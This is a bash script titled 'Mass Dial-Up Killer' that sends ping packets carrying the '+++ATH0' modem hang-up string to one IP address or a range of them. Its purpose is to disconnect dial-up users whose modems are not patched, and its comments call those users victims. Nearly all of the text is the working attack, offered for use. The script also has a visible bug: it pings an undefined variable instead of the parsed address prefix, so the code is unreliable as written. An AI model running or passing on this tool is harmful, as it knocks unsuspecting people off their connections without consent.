#!/bin/bash
#This Script Sends ATZ H0(ath++) to victims
#If the Modem received the ATZ H0(drop command) is not patched,
#The user is beeing Dropped
#It's Possible to dr0p signle user or to give the range of dialups
#to send the dr0p string
#lots of thanx to mr_700 for this aw3s0m3 cutting with ${A/../}
#Written by hip0 of pC-fREAK Org. -===www.pcfreak.cc===-
clear
printf "\t\tMass Dial-Up Killer --ver KillerIX(0.2)\n"
printf "\t\t\=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/\n\n\n\a"
if [ -z $1 ]; then
printf "Enter Start Ip Below From Where The Attack Starts\n"
printf "Example xxx.xxx.xxx.xxx for single ip!\n\n"
printf "Enter Range (example) if you want to send ath++ for range 1/255\n"
printf "use the nmap do $0 1.2.3.1-5. Enjoy the phucking stuff!\n\n\n"
else
sleep 1
A="$1"
B=${A/-*/}
C=${B/*./}
D=${A/*-/}
F=${B/.$C/}
echo $B
echo $C
echo $F
for i in `seq $C $D`; do
printf "\t\tSending Shits...\n"
printf "\t\t****************\n"
ping -c 4 -p 2b2b2b415448300d $E.$i
done
echo -n "Done.."
printf "All Not Patched MOdem in $1 range Killed!\n\n"
fi

